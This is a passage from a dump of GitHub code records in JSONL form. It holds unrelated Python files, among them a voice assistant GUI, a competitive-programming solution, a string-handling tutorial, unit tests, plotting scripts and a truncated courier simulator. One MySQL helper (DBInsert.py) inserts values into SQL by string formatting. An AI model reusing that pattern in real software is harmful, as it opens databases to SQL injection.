os.path.splitext(os.path.split(arg)[-1])[0]\n rospy.set_param('~name', name)\n\nt = Tracer()\nt.spin()\n","repo_name":"DLu/furniture_estimator","sub_path":"src/interpret_laser.py","file_name":"interpret_laser.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"3993462811","text":"# https://atcoder.jp/contests/abc165/tasks/abc165_c\r\n# import sys\r\n# # def input(): return sys.stdin.readline().rstrip()\r\n# # input = sys.stdin.readline\r\n# input = sys.stdin.buffer.readline\r\n# sys.setrecursionlimit(10 ** 7)\r\n\r\nfrom itertools import combinations_with_replacement\r\n\r\ndef main():\r\n N, M, Q = map(int, input().split())\r\n a,b,c,d = [],[],[],[]\r\n for i in range(Q):\r\n _a,_b,_c,_d = map(int, input().split())\r\n a.append(_a-1)\r\n b.append(_b-1)\r\n c.append(_c)\r\n d.append(_d)\r\n ans = 0\r\n for A in combinations_with_replacement(range(M), N):\r\n # print(A)\r\n tmp = 0\r\n for i in range(Q):\r\n if A[b[i]] - A[a[i]] == c[i]:\r\n tmp += d[i]\r\n ans = max(ans, tmp)\r\n print(ans)\r\n return\r\nmain()\r\n\r\n# X = int(input())\r\n# S = input()\r\n# l = list(map(int, (input().split())))\r\n# A = [[int(i) for i in input().split()] for _ in range(N)]\r\n","repo_name":"Hironobu-Kawaguchi/atcoder","sub_path":"atcoder/abc165_c.py","file_name":"abc165_c.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72871881181","text":"# System Module ======================\nfrom tkinter import *\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\nimport tkinter as tk\nimport sys\nfrom threading import Thread\nimport threading\nfrom time import sleep\nimport time\nimport speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport wikipedia\nimport pyjokes\nfrom PyDictionary import PyDictionary\n\n# Local modules ======================\nimport Functions\nimport SystemFunctions\nimport Calculator\n\n# Global Variables ===================\nAI_NAME = \"KRISTHEL\"\nEXIT_COMMANDS = ['shutdown', 'shut down', 'quit', 'exit', 'bye', 'good bye']\nai_text = \"\"\nbg = \"white\"\nbg1 = \"#0b4072\"\nbg2 = \"#EBF8FF\"\nstatus = True\n\n# AI VIRTUAL ASSISTANT VOICE ==================================================\ntry:\n engine = pyttsx3.init()\n r = sr.Recognizer()\n voices = engine.getProperty('voices')\n engine.setProperty('voice', voices[1].id) # male\nexcept Exception as e:\n print(e)\n\n# TEXT TO SPEECH ==============================================================\ndef speak(text):\n lbl_ai_stat['text'] = 'Speaking...'\n ai_text['text'] = text\n print(text)\n engine.say(text)\n engine.runAndWait()\n\n# SPEECH TO TEXT ==============================================================\ndef record():\n with sr.Microphone() as source:\n if status: r.adjust_for_ambient_noise(source, duration=1)\n if status: ai_text['image'] = ''\n if status: speak('Listening..')\n if status: lbl_ai_stat['text'] = 'Listening...'\n if status: ai_text['text'] = '...'\n if status: audio = r.listen(source)\n try:\n if status: print(\"Processing...\")\n if status: lbl_ai_stat['text'] = 'Processing...'\n if status: query = r.recognize_google(audio, language='en_US') # Google for voice recognition.\n if status: print('Your message:', format(query))\n except:\n return\n\n if status: return query\n else: return\n\n# ACTIVATING AI VIRTUAL ASSISTANT =============================================\ndef aiActive1():\n speak(Functions.greet())\n speak(f'My name is {AI_NAME}')\n speak('I am an AI virtual assistant always ready to help you.')\n aiActive()\n\ndef aiActive():\n speak('How may i help you?')\n global status\n while status:\n query = record()\n if query == None: continue\n if isContain(query, EXIT_COMMANDS):\n speak(\"Im going OFFLINE. Good Bye!\")\n lbl_ai_stat['text'] = 'Exiting...'\n ai_text['text'] = '...'\n close()\n break\n else:\n main(query.lower())\n\ndef micSwitch():\n global status\n if status:\n status = False\n print(f\"STATUS: {status} OFFLINE\")\n lbl_ai_stat['text'] = 'Sleeping Zzz...'\n ai_text['text'] = \"...\"\n else:\n status = True\n print(f\"STATUS: {status} ACTIVE\")\n Thread(target=aiActive).start()\n\n# COMMAND HANDLER =========================================================\ndef isContain(txt, lst):\n for word in lst:\n if word in txt:\n return True\n return False\n\ndef main(query):\n # AI VIRTUAL ASSISTANT NAME\n if isContain(query, ['what\\'s your name', 'what is your name', 'who are you', 'what are you']):\n speak('My name is, ' + AI_NAME)\n speak('I am an AI Virtual Assistant created to help you')\n return\n # GREETS BACK\n if isContain(query, ['morning', 'evening', 'noon']) and 'good' in query:\n speak(Functions.chat(\"good\"))\n return\n # CURRENT DATE / TIME\n if isContain(query, ['time', 'date']):\n speak(Functions.chat(query))\n return\n # PLAY YOUTUBE VIDEO\n if 'play' in query:\n speak('Opening youtube...')\n engine.runAndWait()\n pywhatkit.playonyt(query)\n micSwitch()\n return\n # SEARCH IN GOOGLE\n if 'google' in query:\n speak('Searching on Google...')\n engine.runAndWait()\n pywhatkit.search(query)\n micSwitch()\n return\n # DICTIONARY\n if isContain(query, ['definition', 'meaning', 'define']):\n dictionary = PyDictionary()\n query = query.replace('what is', '')\n query = query.replace('the', '')\n query = query.replace('definition', '')\n query = query.replace('meaning', '')\n query = query.replace('define', '')\n query = query.replace('of', '')\n result = dictionary.meaning(query)\n speak(result)\n return\n # TELLS A JOKE\n if 'joke' in query:\n speak(pyjokes.get_joke())\n engine.runAndWait()\n return\n # SEARCH IN WIKIPEDIA\n if 'wikipedia' in query: # if wikipedia found in the query then this block will be executed\n ai_text['text'] = 'Searching Wikipedia...'\n speak('Searching Wikipedia...')\n try:\n query = query.replace(\"wikipedia\", \"\")\n results = wikipedia.summary(query, sentences=3)\n speak(\"According to Wikipedia\")\n print(results)\n speak(results)\n except:\n speak(f\"Your query: {query} was Not Found\")\n speak(\"Please Repeat command\")\n return\n return\n # TRANSLATOR\n if \"translate\" in query:\n sentence = query.replace('translate', '')\n speak(\"Which language to translate ?\")\n language = record()\n result = Functions.lang_translate(sentence, language)\n\n if result == \"None\":\n speak(\"This language doesn't exists\")\n else:\n speak(f\"In {language.capitalize()} you would say:\")\n print(f\"In {language.capitalize()} you would say: \", result.text)\n speak(result.text)\n return\n # TOSS A COIN / ROLL A DIE\n if isContain(query, ['coin', 'dice', 'die']):\n if isContain(query, ['toss', 'roll', 'flip', 'throw']):\n result = Functions.generate(query)\n print(result)\n if \"Head\" in result:\n image = ImageTk.PhotoImage(Image.open('images/head.png').resize((200, 200), Image.ANTIALIAS))\n ai_text['image'] = image\n elif \"Tail\" in result:\n image = ImageTk.PhotoImage(Image.open('images/tail.png').resize((200, 200), Image.ANTIALIAS))\n ai_text['image'] = image\n else:\n image = ImageTk.PhotoImage(Image.open('images/' + result[-1] + '.png').resize((200, 200), Image.ANTIALIAS))\n ai_text['image'] = image\n speak(result)\n return\n # BASIC CALCULATOR\n if isContain(query, ['calculate', 'compute']):\n try:\n query = query.replace('calculate', '')\n query = query.replace('compute', '')\n query = query.replace('negative ', '-')\n\n speak(('Result is: ' + Calculator.calculate(query)))\n except Exception as e:\n return\n return\n # OPEN WEBSITE / SYSTEM PROGRAM\n if 'open' in query:\n bool = SystemFunctions.accessApp(query)\n if bool == False:\n speak(f\"Your query: {query} was Not Found\")\n micSwitch()\n return\n # TAKE SCREENSHOT\n if 'screenshot' in query:\n # Thread(target=SystemFunctions.winOpt(query), args=('screenshot', 'capture', 'snapshot')).start()\n SystemFunctions.winOpt(query)\n speak(\"Screenshot Taken\")\n micSwitch()\n return\n # CLOSE CURRENT SELECTED/ACTIVE WINDOW\n if isContain(query, ['window', 'close that']):\n SystemFunctions.winOpt(query)\n return\n # CLOSE CURRENT TAB\n if isContain(query, ['tab']):\n SystemFunctions.tabOpt(query)\n return\n # WRITE\n if isContain(query, ['type', 'save', 'delete', 'select', 'press enter']):\n SystemFunctions.systemOpt(query)\n return\n\n# GUI Functions ===========================================================================================\ndef progressbar():\n s = ttk.Style()\n s.theme_use('clam')\n s.configure(\"cyan.Horizontal.TProgressbar\", foreground='#2ee3ec', background='#2ee3ec')\n progress_bar = ttk.Progressbar(splash_root, style=\"cyan.Horizontal.TProgressbar\", orient=\"horizontal\",\n mode=\"determinate\", length=303)\n progress_bar.pack()\n splash_root.update()\n progress_bar['value'] = 0\n splash_root.update()\n\n while progress_bar['value'] < 100:\n progress_bar['value'] += 5\n splash_root.update()\n sleep(0.3)\n\ndef destroySplash():\n splash_root.destroy()\n\ndef close():\n time.sleep(1)\n root.destroy()\n sys.exit()\n\n# Driver Program ===============================================================================================================\nif __name__ == '__main__':\n # SPLASH Screen ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n splash_bg = \"#0b4072\"\n splash_root = Tk()\n splash_root.configure(bg=splash_bg)\n splash_root.overrideredirect(True)\n\n w_width, w_height = 500, 550\n s_width, s_height = splash_root.winfo_screenwidth(), splash_root.winfo_screenheight()\n x, y = (s_width / 2) - (w_width / 2), (s_height / 2) - (w_height / 2)\n splash_root.geometry('%dx%d+%d+%d' % (w_width, w_height, x, y - 30))\n\n obj_bot = ImageTk.PhotoImage(Image.open(\"images/bot.png\").resize((350, 350), Image.ANTIALIAS))\n img_ai = Label(splash_root, image=obj_bot, bg=splash_bg)\n img_ai.pack(pady=(20, 0))\n\n splash_label = Label(splash_root, text=AI_NAME, font=('calibri', 15, \"bold\"), bg=splash_bg, fg='white')\n splash_label.pack()\n splash_label1 = Label(splash_root, text=\"AI Virtual Assistant\", font=('calibri', 15, \"bold\"), bg=splash_bg, fg='white')\n splash_label1.pack(pady=(0,40))\n\n progressbar()\n splash_root.after(10, destroySplash)\n splash_root.mainloop()\n\n # MAIN Screen ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n root = Tk()\n root.title(AI_NAME)\n icon = PhotoImage(file='images/bot.png')\n root.iconphoto(True, icon)\n w_width, w_height = 500, 800\n s_width, s_height = root.winfo_screenwidth(), root.winfo_screenheight()\n x, y = (s_width / 2) - (w_width / 2), (s_height / 2) - (w_height / 2)\n root.geometry('%dx%d+%d+%d' % (w_width, w_height, x, y - 30)) # center location of the screen\n root.configure(bg=bg2)\n root.resizable(width=False, height=False)\n # FRAME 1: AI logo and status ------------------------------------------\n frame1 = Frame(root, bg=bg1)\n frame1.pack(fill=\"both\", expand=True)\n\n obj_bot = ImageTk.PhotoImage(Image.open(\"images/bot.png\").resize((300, 300), Image.ANTIALIAS))\n img_ai = Label(frame1, image=obj_bot, bg=bg1)\n img_ai.pack()\n\n lbl_ai_stat = Label(frame1, text='OFFLINE', font=('calibri', 16), fg='white', bg=bg1)\n lbl_ai_stat.pack(pady=(0, 20))\n\n # FRAME 2: AI Text output ------------------------------------------\n frame2 = Frame(root, bg=bg2)\n frame2.pack(fill=\"both\", expand=True)\n\n canvas = tk.Canvas(frame2, bg=bg2, height=360)\n scrollbar = ttk.Scrollbar(frame2, orient=\"vertical\", command=canvas.yview)\n scrollable_frame = ttk.Frame(canvas)\n scrollable_frame.bind(\n \"\",\n lambda e: canvas.configure(\n scrollregion=canvas.bbox(\"all\")\n ),\n )\n style = ttk.Style()\n style.configure(\"Vertical.TScrollbar\", background=\"green\", bordercolor=\"red\", arrowcolor=\"white\")\n canvas.create_window((0, 0), window=scrollable_frame)\n canvas.configure(yscrollcommand=scrollbar.set)\n\n ai_text = Label(scrollable_frame, text=\"\", font=('calibri', 12),\n wraplength=450, bg=bg2, justify=\"center\", anchor=\"center\")\n ai_text.pack(ipady=10, ipadx=15)\n\n canvas.pack(side=\"left\", fill=\"both\", expand=True)\n scrollbar.pack(side=\"right\", fill=\"y\")\n\n # FRAME 3: mic switch ----------------------------------------------\n frame3 = Frame(root, bg=bg2)\n frame3.pack(fill=\"both\", expand=True, side = BOTTOM)\n\n obj_mic = ImageTk.PhotoImage(Image.open(\"images/mic-1.png\").resize((55, 55), Image.ANTIALIAS))\n btn_mic = tk.Button(frame3, image=obj_mic, bg=bg2, activebackground=bg2,\n command=micSwitch)\n btn_mic[\"border\"] = \"0\"\n btn_mic.pack(pady=10)\n\n# Activate KRISTHEL AI Virtual Assistant =============================================================\n try:\n main_thread = threading.Thread(target=aiActive1)\n main_thread.start()\n except:\n pass\n\nroot.mainloop()","repo_name":"JzCatherine/KRISTHEL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"31994595480","text":"\"\"\"\nSlipt, Join, Enumerate em Pyhton\n* Split - Dividir uma string # str\n* Join - Juntar uma lista # str\n* Enumerate - Enumerar elementos da lista # str / iteraiveis\n\"\"\"\n\nfrase = \"Python é muito legal, estou gostando muito de aprender, é show de bola!\"\nlista = frase.split(' ') # aqui separa por espaco\nlista2 = frase.split(',') # aqui separa por virgula\nprint(lista, lista2)\n\n# contar palavras\nfor valor in lista:\n print(f'A palavra {valor} apareceu {lista.count(valor)}x na frase.')\n\n# qual palavra apareceu mais vezes na frase\npalavra = ''\ncontagem = 0\nfor valor in lista:\n qtd_vezes = lista.count(valor)\n\n if qtd_vezes > contagem:\n contagem = qtd_vezes\n palavra = valor\nprint(f'A palavra que apareceu mais vezes é: \"{palavra}\" e a contagem de vezes é: ({contagem}x)')\n\n# retirando espaço de uma frase e alterando o inicio da letra para maiuscula\nfor valor in lista2:\n print(valor.strip().capitalize())\n\n# Join\nfrase2 = 'Python é muito legal'\nlista3 = frase2.split(' ')\nfrase3 = ','.join(lista3)\nprint(frase3)\n\n# Enumerate\nfrase4 = 'Python é muito legal'\nlista4 = frase4.split(' ')\n\nfor indice, valor in enumerate(lista4):\n print(indice, valor)\n","repo_name":"iprih/curso-python","sub_path":"logica-de-programacao/slipt-join-enumerate.py","file_name":"slipt-join-enumerate.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"16474610943","text":"import mysql.connector\n# Open database connection\ndef getConnected():\n con = mysql.connector.Connect(host='localhost',\n database='mydb',user='root', password='root')\n return con\ndef addrec(id, name):\n con = getConnected()\n cursor = con.cursor()\n sql = \"INSERT INTO PERSON(ID, PNAME) VALUES ('%s', '%s')#\" % (id,name)\n try: # Execute the SQL command\n cursor.execute(sql)\n print (sql)\n con.commit() # Commit your changes in the database\n except Exception as e:\n con.rollback() # Rollback in case there is any error\n print (e)\n con.close() # disconnect from server\ndef viewRecord():\n con=getConnected()\n sql = \"SELECT * FROM PERSON\"\n cursor=con.cursor()\n text=\"\"\n try:\n # Execute the SQL command\n cursor.execute(sql)\n # Fetch all the rows in a list of lists.\n results = cursor.fetchall()\n for col in results:\n id = col[0]\n pname = col[1]\n \n # Now print fetched result\n text=text+\"\"+str(id)+\" \"+pname+\" \"\n except Exception as e:\n print (\"Error: unable to fecth data \",e)\n con.close()\n return \"\"\n","repo_name":"bhimsenrao/djangoproj","sub_path":"djProg2/myapp1/DBInsert.py","file_name":"DBInsert.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31316971026","text":"import tqdm\nfrom multiprocessing import Process, Pipe\n\n\ndef bootstrap(\n func, args, kwargs,\n num_runs,\n num_jobs = 1,\n):\n\n if num_jobs == 1:\n for iter_id in tqdm.tqdm(range(num_runs)):\n kwargs['seed'] = iter_id\n func(*args, **kwargs)\n\n elif num_jobs > 1:\n # initialize pipes\n pipe_list = [Pipe() for i in range(num_jobs)]\n\n # initialize processes\n proc_list = [\n Process(\n target = _mp_wrapper, \n args = (pipe_list[i][1], func, args, kwargs)\n ) for i in range(num_jobs)\n ]\n\n # start subprocesses\n for i in range(num_jobs):\n proc_list[i].start()\n\n # main loop\n for iter_id in tqdm.tqdm(range(num_runs)):\n # rotate\n i = 0\n while True:\n if pipe_list[i][0].poll():\n # receive ready signal\n _ = pipe_list[i][0].recv()\n\n # send iter_id to subprocess\n seed = iter_id\n pipe_list[i][0].send(seed)\n\n # next iter_id\n break\n\n else:\n i = (i + 1) % num_jobs\n\n # send termination signal to subprocesses\n for i in range(num_jobs):\n pipe_list[i][0].send(-1)\n\n # close pipes\n for i in range(num_jobs):\n pipe_list[i][0].close()\n\n # waiting for subprocesses to join/return\n for i in range(num_jobs):\n proc_list[i].join()\n\n else:\n pass\n\n\ndef _mp_wrapper(pipe, func, args, kwargs):\n\n while True:\n # send ready signal to main process\n pipe.send(1)\n\n # receive iter_id from main process\n seed = pipe.recv()\n\n if seed != -1:\n # seed can be any number as long as it's unique among all subprocesses\n kwargs['seed'] = seed\n\n # run\n func(*args, **kwargs)\n\n else:\n pipe.close()\n return\n","repo_name":"CRANK-MS/CRANK-MS","sub_path":"paper/bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"69"}
+{"seq_id":"16813311479","text":"import os\nfrom lxml import etree as ET\nimport json\nimport sys\n\n\ndef check(folder):\n for root, dirs, files in os.walk(''):\n xml_files = [i for i in files if '.xml' in i]\n for file in xml_files:\n xml_parsed = ET.parse('{}/{}'.format(root, file)).getroot()\n if xml_parsed.tag == 'error':\n print('{}/{}'.format(root, file))\n\n json_files = [i for i in files if '.json' in i]\n for file in json_files:\n with open('{}/{}'.format(root, file), 'r') as f:\n parsed_json = json.loads(f.read())\n if 'message' in parsed_json and parsed_json['message'] == \"Requested item not found\":\n print('{}/{}'.format(root, file))\n\n\nif __name__ == '__main__':\n try:\n folder = sys.argv[1]\n except IndexError:\n print('\\nChange to: \"python looking_for_404_records.py $folder\\n\\n')\n quit()\n check(folder)\n","repo_name":"lsulibraries/cdm_xporter","sub_path":"one_off_scripts/cleaning_repository/looking_for_404_records.py","file_name":"looking_for_404_records.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30506452512","text":"import unittest\n\nfrom dart.model.event import Event\nfrom dart.model.event import EventData\nfrom dart.model.exception import DartValidationException\nfrom dart.schema.base import default_and_validate\nfrom dart.schema.event import event_schema\n\n\nclass TestEventSchema(unittest.TestCase):\n\n def test_event_schema(self):\n state = None\n e = Event(data=EventData('test-event', state=state))\n obj_before = e.to_dict()\n e = default_and_validate(e, event_schema())\n # state should be defaulted to INACTIVE\n self.assertNotEqual(obj_before, e.to_dict())\n\n def test_event_schema_invalid(self):\n with self.assertRaises(DartValidationException) as context:\n name = None\n e = Event(data=EventData(name))\n # should fail because the name is missing\n default_and_validate(e, event_schema())\n\n self.assertTrue(isinstance(context.exception, DartValidationException))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"RetailMeNotSandbox/dart","sub_path":"src/python/dart/test/schema/test_event.py","file_name":"test_event.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"69"}
+{"seq_id":"32041336972","text":"import pytest\n\nfrom salient.salient import find_duplicate_definitions, DuplicateFinder\n\ndata = \"\"\"\nfrom sqlalchemy import Boolean, Column, Integer\n\nclass RedefinedColumnsModel:\n __table_name__ = 'redefined_columns_model'\n duplicate = Column(Integer)\n col_1 = Column()\n col_2 = Column()\n duplicate = Column(Boolean)\n\nfalse_positive = True\nfalse_positive = False\n\"\"\"\n\n\n@pytest.mark.asyncio\nasync def test_find_duplicate_definitions():\n res = await find_duplicate_definitions(data)\n assert len(res) == 1\n assert \"duplicate\" in res\n assert res[\"duplicate\"][0] == (6, \"Column(Integer)\")\n assert res[\"duplicate\"][1] == (9, \"Column(Boolean)\")\n assert \"false_positive\" not in res\n\n\ndef test_duplicate_finder():\n nums = [1, 2, 3, 1, 2, 3, 4, 5, 6]\n df = DuplicateFinder()\n for i, n in enumerate(nums):\n df[n] = i\n assert 4 not in df.duplicates\n assert 5 not in df.duplicates\n assert 6 not in df.duplicates\n assert 1 in df.duplicates\n assert 2 in df.duplicates\n assert 3 in df.duplicates\n\n for n in nums:\n assert n in df.items\n","repo_name":"TomFaulkner/sa_lint","sub_path":"tests/test_redefined.py","file_name":"test_redefined.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32884737994","text":"# from sklearn.datasets import load_iris\r\n# iris = load_iris()\r\n# print(iris.feature_names)\r\n# print(iris.target_names)\r\n# print(iris.data[0])\r\n# print(iris.target[0])\r\n\r\nimport numpy as np\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn import tree\r\nimport pydotplus\r\n#viz code\r\nfrom sklearn.externals.six import StringIO\r\n\r\niris = load_iris()\r\ntest_idx = [0, 50, 100]\r\n\r\n#training data\r\ntraining_label = np.delete(iris.target, test_idx)\r\ntrain_data = np.delete(iris.data, test_idx, axis=0)\r\n\r\n#test data\r\ntest_label = iris.target[test_idx]\r\ntest_data = iris.data[test_idx]\r\n\r\nclf = tree.DecisionTreeClassifier()\r\nclf.fit(train_data, training_label)\r\nprint(test_label)\r\nprint(clf.predict(test_data))\r\n\r\n# import pydotplus\r\ndot_data = StringIO()\r\ntree.export_graphviz(clf, \r\n out_file=dot_data,\r\n feature_names=iris.feature_names,\r\n class_names=iris.target_names,\r\n filled=True, rounded=True,\r\n impurity=False)\r\ngraph = pydotplus.graph_from_dot_data(dot_data.getvalue())\r\ngraph.write_pdf(\"iris.pdf\")\r\nprint(iris.feature_names, iris.data[0], iris.target_names[iris.target[0]])\r\n","repo_name":"dolajide/ml","sub_path":"viz.py","file_name":"viz.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"44645700444","text":"def gg():\n print(\"****************************\")\n\n# directory setting \nimport os, re\nos.chdir(r'C:\\Users\\user\\Desktop\\파이썬\\Do-it-Python\\Do-it-python-practice\\03 텍스트 파일 가공하기')\nprint(os.getcwd())\ngg()\n\n# file load\nf = open('friends101.txt', 'r', encoding='utf8')\nscript101 = f.read()\nprint(script101[:100])\ngg()\n\n# only extract Monica's lines\nLine = re.findall(r'Monica:.+', script101)\nfor item in Line[:3]:\n print(item)\nf.close()\ngg()\n\n# save extracted lines \nf = open('monica.txt', 'w', encoding = 'utf8')\nmonica=''\nfor i in Line:\n monica += i+'\\n'\nf.write(monica)\nf.close()\n# extract character names\n# in the script every line starts with 'character :' format\nchar=re.compile(r'[A-Z][a-z]+:')\nprint(re.findall(char, script101))\ngg()\n\n# to remove duplicated names, use 'set' data type\nnames = set(re.findall(char, script101))\nprint(names)\ngg()\n\n# to remove \":\", change the 'set' to a 'list'\ncharacters = []\nfor i in list(names):\n characters += [i[:-1]]\nprint(characters)\ngg()\n\n# to make it simpler, one can also condense everything above into a single code\ncharacters = [x[:-1] for x in list(set(re.findall(r'[A-Z][a-z]+:', script101)))]\nprint(characters)\ngg()\n\n# What if I want to remove the 'directions' from the lines?\n# They start with '(' and ends with ')'\nf = open('monica_except_directions.txt', 'w', encoding = 'utf8')\nmonica_except_directions=''\n# test = 'Monica: (explaining to the others) Carol moved her stuff out today.'\n# test = re.sub(r'\\s\\(.+\\)', '', test)\n# print(test)\nfor i in Line:\n i = re.sub(r'\\s\\(.+\\)', '', i)\n monica_except_directions += i +'\\n'\n# print(monica_except_directions)\nf.write(monica_except_directions)\nf.close()\ngg()\n\n# Can I find sentences that include a certain word?\n# Every line starts with 'character: ' and the sentence should include a certain word, let's say 'would'\nwith open('friends101.txt', 'r') as f:\n sentences = f.readlines()\n lines_with_would = ''\n for i in sentences:\n if re.match(r'[A-Za-z]+:', i):\n if re.search('would', i):\n lines_with_would += i\n print(lines_with_would)\n \n # to make it even simpler\n lines_with_would = [i for i in sentences if re.match(r'[A-Za-z]+:', i) and re.search('would', i)]\n for i in lines_with_would:\n print(i)\n with open('would.txt', 'w') as newf:\n newf.writelines(lines_with_would) \n \n\n","repo_name":"uakbuak/Do-it-python-practice","sub_path":"03 텍스트 파일 가공하기/ScriptCrawl.py","file_name":"ScriptCrawl.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42362476864","text":"#!/usr/bin/env python\n\"\"\"\n| *author*: Johannes Röttenbacher\n| *created*: 01.03.2023\n\nResults of icecloud sensitivity simulations with libRadtran\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n\n\n.. |plot-path| replace:: ./docs/figures/icecloud\n\n\"\"\"\n\nif __name__ == \"__main__\":\n # %% import modules\n import pylim.helpers as h\n import pylim.halo_ac3 as meta\n import xarray as xr\n import numpy as np\n import matplotlib.pyplot as plt\n\n cm = 1/2.54\n cbc = h.get_cb_friendly_colors()\n\n # %% set paths\n campaign = \"halo-ac3\"\n flight_key = \"RF17\"\n flight = meta.flight_names[flight_key]\n date = flight[9:17]\n\n plot_path = \"./docs/figures/icecloud\"\n libradtran_path = h.get_path(\"libradtran_exp\", flight, campaign)\n libradtran_file = f\"HALO-AC3_HALO_libRadtran_simulation_icecloud_{date}_{flight_key}.nc\"\n\n # %% plotting meta\n h.set_cb_friendly_colors()\n plt.rc(\"font\", size=12)\n figsize_wide = (24 * cm, 12 * cm)\n figsize_equal = (12 * cm, 12 * cm)\n cloud_top = 7500 # m\n cloud_base = 6500 # m\n\n # %% read in libradtran file\n ds = xr.open_dataset(f\"{libradtran_path}/{libradtran_file}\")\n\n # %% plot all combinations of IWC and re_eff_ice\n ds_plot = ds\n nr_iwc = ds.iwc.shape[0]\n _, ax = plt.subplots(figsize=figsize_wide)\n for i in range(ds.re_ice.shape[0]):\n x = np.repeat(ds.re_ice[i].values, nr_iwc)\n ax.plot(x, ds.iwc, \"o\", ls=\"\")\n ax.set_xlim(0, 70)\n ax.set_xticks(np.arange(0, 70, 10))\n ax.set_yscale(\"log\")\n ax.grid()\n ax.set_title(\"All combinations of IWC and r$_{eff, ice}$\")\n ax.set_xlabel(r\"Ice Effective Radius ($\\mu$m)\")\n ax.set_ylabel(r\"Ice Water Content (g$\\,$m$^{-3}$)\")\n plt.tight_layout()\n figname = f\"{plot_path}/icecloud_sensitivity_study_iwc-re_ice_combinations.png\"\n plt.savefig(figname, dpi=300)\n plt.show()\n plt.close()\n\n # %% integrate spectral simulations\n ds[\"eglo_int\"] = ds.eglo.integrate(\"wavelength\")\n\n # %% calculate difference in spectra above and below cloud\n ds[\"eglo_diff\"] = ds.eglo.sel(altitude=cloud_top) - ds.eglo.sel(altitude=cloud_base)\n\n # %% plot spectral difference between above and below\n ds_plot = ds[\"eglo_diff\"]\n g = ds_plot.isel(time=0, drop=True).plot(x=\"wavelength\", hue=\"iwc\", col=\"re_ice\", col_wrap=3, add_legend=True)\n for i, ax in enumerate(g.axes.flat):\n ax.grid()\n ax.set_title(r\"r$_{eff, ice}$ = \" + f\"{ds.re_ice[i].values:.0f}\")\n ax.get_legend_handles_labels()\n if i > 2:\n ax.set_xlabel(\"Wavelength (nm)\")\n g.axes.flat[0].set_ylabel(r\"Irradiance (W$\\,$m$^{-2}$)\")\n g.axes.flat[3].set_ylabel(r\"Irradiance (W$\\,$m$^{-2}$)\")\n g.figlegend.set_title(r\"IWC (g$\\,$m$^{-3}$)\")\n g.figlegend.set_bbox_to_anchor((0.99, 0.77))\n plt.suptitle(\"Difference between Spectral Solar Downward Irradiance Above and Below Cloud\")\n plt.tight_layout()\n plt.subplots_adjust(top=0.9)\n figname = f\"{plot_path}/libradtran_icecloud_study_spectral_difference_above-below.png\"\n plt.savefig(figname, dpi=300)\n plt.show()\n plt.close()\n\n","repo_name":"jroettenbacher/phd_base","sub_path":"experiments/libradtran_icecloud_sensitivity_study.py","file_name":"libradtran_icecloud_sensitivity_study.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"3511686500","text":"import time\r\nimport numpy as np\r\nfrom simulator.orders import *\r\nfrom simulator.couriers_update_200_2min import *\r\nfrom simulator.utility import get_distance_hav\r\n\r\n# 更新换单处理时间----符合实际情况\r\n\r\n# 对一个商圈Region数据做实验\r\n\r\nclass Region:\r\n def __init__(self, courier_init, real_orders):\r\n self.courier_init = courier_init\r\n self.real_orders = real_orders\r\n self.day_orders = [] # 初始化;用于存储对象,后续对这些对象作每个时间步订单配送状态的更新,状态为2,则配送完成则不再管。\r\n self.day_couriers = [] # 初始化为骑手第一次出现的时间步和位置,后面可以根据预测的路径往里面加后续时间步的位置信息\r\n self.city_time = 0 # 0- 8640 中的一个值,表示当前所处的时间步\r\n self.n_step = 86400 # 一天一共的时间步个数\r\n # self.order_response_rate = 0\r\n\r\n self.couriers_dict = {} # 用于存储对象,后续对这些对象作每个时间步位置的更新\r\n\r\n # self.day_encounter = [[] for _ in np.arange(self.n_step)]\r\n self.encounter_exchange_event = []\r\n # 平台派单(按距离最近派单的逻辑)策略\r\n\r\n def bootstrap_one_day_orders(self):\r\n # 将订单数据输入加载入模型\r\n # ['1', '31.255537', '121.45916', '31.25317194', '121.46889204', 0-4\r\n # '2020-10-01 11:59:14', '2020-10-01 12:17:56', '37.99', '3.8', 5-8,\r\n # '269345', '23487920.0', '2758233.0', '2020-10-01 12:03:56', 9-12\r\n # '2020-10-01 12:07:16', '2020-10-01 12:09:06'] 13-14\r\n # 5为创建订单,送达为6,到店为13\r\n day_orders = [[] for _ in np.arange(self.n_step)]\r\n count = 0\r\n for iorder in self.real_orders:\r\n # 2020-10-1\r\n order_create_timestep = int((int(time.mktime(time.strptime(iorder[5], \"%Y-%m-%d 